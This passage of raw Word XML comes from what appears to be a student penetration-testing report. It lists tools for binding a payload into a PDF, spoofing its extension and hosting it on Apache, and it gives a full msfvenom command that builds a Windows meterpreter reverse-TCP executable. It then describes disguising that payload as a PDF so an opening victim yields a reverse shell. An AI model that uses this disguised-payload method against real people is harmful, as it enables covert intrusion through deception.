        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A70784" w14:textId="77777777" w:rsidR="00B277C5" w:rsidRDefault="00B277C5" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7733543D" w14:textId="3FD61316" w:rsidR="00E17944" w:rsidRDefault="00E17944" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Celesty File Binder:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>We will be using this tool in windows in order to integrate the payload and a pdf.Also we will use this to change the icon of the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE479E1" w14:textId="6590A859" w:rsidR="00640314" w:rsidRDefault="00640314" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Characters:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>This is a GUI based application that we will be using in kali in order to spoof the extension to pdf file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758C11ED" w14:textId="358085C5" w:rsidR="004F49A7" w:rsidRPr="00B277C5" w:rsidRDefault="00640314" w:rsidP="00B277C5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Apache2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>We will be using apache2 web server in order to host our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7740CD9F" w14:textId="39EA97C1" w:rsidR="004F49A7" w:rsidRDefault="004F49A7" w:rsidP="004F49A7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F49A7">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BOUNDARIES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC92CA" w14:textId="43606C9B" w:rsidR="001242B7" w:rsidRPr="001242B7" w:rsidRDefault="001242B7" w:rsidP="001242B7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">It must be noted that the whole process( delivering the payload,executing the payload by the victim,gaining a reverse shell) upto getting a reverse shell is a based on client interaction.So if the victim has proper antivirus or security setting,then the file will be immediately deleted after recognizing it as a virus file.But it was not the case for privilege escalation.We can successfully </w:t>
      </w:r>
      <w:r w:rsidR="00AA6D69">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>escalated our privilege without client interaction because some escalation vectors must be in the system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA6D69">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:r w:rsidR="00B277C5">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>in order to gain the initial foot hold it is necessary for the system to be vulnerable or we should use appropriate social engineering techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60110F8F" w14:textId="1FE80AB4" w:rsidR="007C5290" w:rsidRDefault="004F49A7" w:rsidP="007C5290">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E769E60" w14:textId="77777777" w:rsidR="007C5290" w:rsidRPr="007C5290" w:rsidRDefault="007C5290" w:rsidP="007C5290">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352631A0" w14:textId="77777777" w:rsidR="00640314" w:rsidRPr="00640314" w:rsidRDefault="00640314" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B546BAA" w14:textId="77777777" w:rsidR="00640314" w:rsidRPr="00640314" w:rsidRDefault="00640314" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11486CD2" w14:textId="7A2C8F47" w:rsidR="00D96BB2" w:rsidRDefault="00D96BB2" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A819A38" w14:textId="790620E5" w:rsidR="00B277C5" w:rsidRDefault="00B277C5" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B28E720" w14:textId="6B37B33A" w:rsidR="00B277C5" w:rsidRDefault="00B277C5" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E3BAF8" w14:textId="0588A286" w:rsidR="00B277C5" w:rsidRDefault="00B277C5" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65CFADC4" w14:textId="23EF6E30" w:rsidR="00B277C5" w:rsidRDefault="00B277C5" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3362F643" w14:textId="768E4579" w:rsidR="007C5290" w:rsidRDefault="007C5290" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0C2AB1" w14:textId="2CCEAC55" w:rsidR="007C5290" w:rsidRDefault="007C5290" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB5FF2A" w14:textId="540AB045" w:rsidR="007C5290" w:rsidRDefault="007C5290" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249984CF" w14:textId="028666D2" w:rsidR="007C5290" w:rsidRPr="00DB2FD1" w:rsidRDefault="007C5290" w:rsidP="00DB2FD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2FD1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>STRATEGIES TO ACCOMPOLISH THE</w:t>
      </w:r>
      <w:r w:rsidR="00DB2FD1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2FD1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F730AED" w14:textId="77777777" w:rsidR="007C5290" w:rsidRPr="007C5290" w:rsidRDefault="007C5290" w:rsidP="007C5290">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5290">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Generating the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDCB9ED" w14:textId="147441CE" w:rsidR="007C5290" w:rsidRPr="008B770D" w:rsidRDefault="007C5290" w:rsidP="007C5290">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In order to gain initial foothold of the system we have to craft a payload.Inorder to create the payload we will use MSFVENOM tool.It is launched as a payload generator of Metasploit.We can also use it as a command -line standalone application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D28F1" w14:textId="40F897CC" w:rsidR="007C5290" w:rsidRPr="008B770D" w:rsidRDefault="007C5290" w:rsidP="007C5290">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The CLI looks li</w:t>
      </w:r>
      <w:r w:rsidR="008B770D" w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ke:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E1AC6B" w14:textId="60288EC3" w:rsidR="007C5290" w:rsidRDefault="007C5290" w:rsidP="007C5290">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718F25FF" wp14:editId="1BB1A764">
            <wp:extent cx="5731510" cy="23571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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F803691" w14:textId="3B57622B" w:rsidR="008B770D" w:rsidRPr="008B770D" w:rsidRDefault="008B770D" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Now to have to cr</w:t>
      </w:r>
      <w:r w:rsidR="00D13AAE">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ft a payload using the MSFVENOM.We are going to use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA2D93" w14:textId="77777777" w:rsidR="008B770D" w:rsidRPr="008B770D" w:rsidRDefault="008B770D" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[Listening IP] LPORT=[Listening Port] -f exe &gt; now_see.exe”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27167A8D" w14:textId="77777777" w:rsidR="008B770D" w:rsidRPr="008B770D" w:rsidRDefault="008B770D" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Msfvenom is basically the payload generator tool we will be using.Since we are crafting a payload for windows with an x64 architecture and we want a meterpreter shell when its gets executed in the victim’s computer,we are using this format.”</w:t>
      </w:r>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reverse_tcp means we will get a reverse shell,connecting from victim’s machine to the attacker’s machine”.</w:t>
      </w:r>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-f denotes the file type which is an executable one here.”</w:t>
      </w:r>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">now_see.exe” </w:t>
      </w:r>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">is the name of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B4B62" w14:textId="77777777" w:rsidR="008B770D" w:rsidRDefault="008B770D" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9A12BD" w14:textId="77777777" w:rsidR="008B770D" w:rsidRDefault="008B770D" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45730C29" w14:textId="7236EB93" w:rsidR="008B770D" w:rsidRPr="00A63E63" w:rsidRDefault="008B770D" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>the payload.Listening ip,Listening port  refers to the attackers ip and the port where the attacker is listening for reverse connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189EFB7" w14:textId="2ED3942C" w:rsidR="008B770D" w:rsidRDefault="008B770D" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk103272568"/>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>After generating the payload using the above command we get an image like below</w:t>
      </w:r>
      <w:r w:rsidRPr="008B770D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="05E81C5A" w14:textId="59139CD9" w:rsidR="008B770D" w:rsidRPr="008B770D" w:rsidRDefault="00D13AAE" w:rsidP="008B770D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6075087F" wp14:editId="1E199EC0">
            <wp:extent cx="5350679" cy="2141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55070" cy="2142977"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C528338" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>The red marked file is the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1480D9D5" w14:textId="5C376776" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>Though our payload is ready we cant send it to the victim’s computer like this,because the victim may find it as suspicious,resulting him deleting the file.So we have to give it such a format,that will not appear as suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54890756" w14:textId="6A9B1C2D" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GENERATING THE PAYLOAD ICON:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03981482" w14:textId="44404841" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
        <w:t>So the plan is to integrate a pdf file and the payload we have just created,whole as pdf file and deliver it to the victim.So when victim opens the integrate pdf file,the pdf file will open and at the same time the payload will get executed,connecting it to the attacker’s machine,resulting in an reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C576344" w14:textId="77777777" w:rsidR="00D13AAE" w:rsidRPr="00A63E63" w:rsidRDefault="00D13AAE" w:rsidP="00D13AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
